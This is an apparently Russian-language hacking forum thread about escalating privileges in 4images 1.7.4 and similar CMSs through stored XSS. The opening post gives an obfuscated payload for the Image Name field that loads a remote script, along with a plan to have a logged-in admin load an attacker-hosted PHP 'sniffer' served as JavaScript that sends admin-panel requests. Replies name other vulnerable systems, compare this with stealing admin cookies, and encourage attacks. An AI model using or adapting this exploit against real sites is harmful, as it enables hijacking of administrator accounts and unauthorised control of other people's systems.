![]() |
Повышение привелегий с помощью Xss
Подготовка.
Заливаем в галерею картинку. в поле Image Name: вставляем Код:
"><IMG SRC="javascript:document.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,108,111,99,97,108,104,111,115,116,47,49,46,106,115,34,62,60,47,115,99,114,105,112,116,62));">1. Вариант Админу кидаем ссылку на http://virussite.com/ 1. Залогиненый админ заходит на http://virussite.com/ 2. Получает от сервера ответ типа Код:
<html>2.Вариант :) Админ сам тыкает на надпись New Images. 4. Там подгружается скрипт http://oursite.com/xss.js (реально это сниффер на php который на выходе генерит JS код), который посылает запрос к админке. код php скрипта, его называем xss.js ЭТО РЕАЛЬНО РАБОТАЮЩИЙ ПРИМЕР ДЛЯ 4Images 1.7.4(вероятно и версии ниже) Код:
<?phpКод:
AddType application/x-httpd-php .jsP.S.Сообственно код сыроват, надо поправить , но у меня не особо хватает вермени, ну хоть 1 кто нить помогите, пож-та. P.S.S.Если это будет интересно, давайте искать XSS, и писать скрипты повышения привелегий, под разные системы. P.S.S.S.Когда инфы наберём побольше , можно сотворить генератор js файла, чтоб автоматизировать процесс. |
найди сначала админку, где для входа достаточно кукисов.
в большинстве форумов/цмс нужен пасс для авторизации в админке |
нашел уже 2.
4images Datalife Engine 6.0 да их жопой хоть жуй. |
в Coppermine Photo Gallery тож по кукисам, даже помниться сплоент писал, использующий XSS
|
завтра будет 1 скрипт под 4images
|
Если у нас есть Xss, а на вход в админку нужны только куки, почему бы просто не взять админские куки на пользование и все? Зачем выставлять левому пользователю админские права (что, несомненно, палевно)
|
ну как тебе сказать когда в системе >100 юзеров, то не такое и палево, зато с сессией не надо заморачиваться
|
Найдена XSS в 4images. Статья обновлена. Читаем. Начинаем бомбить :).
|
Эх...
"Хакеры" все еще здесь... =/ Вам не надоело дрочить Xss? Полный хелп по КСС еще не делали? Таких "статей" можно нахреначить до куевой кучи и все чмем то схожы...! Если неправ можете бить сильно... |
не бить надо за такие посты, а просто пиздетЬ.
Реализация атак через ксс имеет много вариантов. Так что не хрен тут постить хреновину, нельзя на 2 недели уехать начинается. И вообще , тут представлена не просто очередная статья на тему, а вариант использования и работающий сплоит под последнюю версию, так что баста! |
| Время: 06:59 |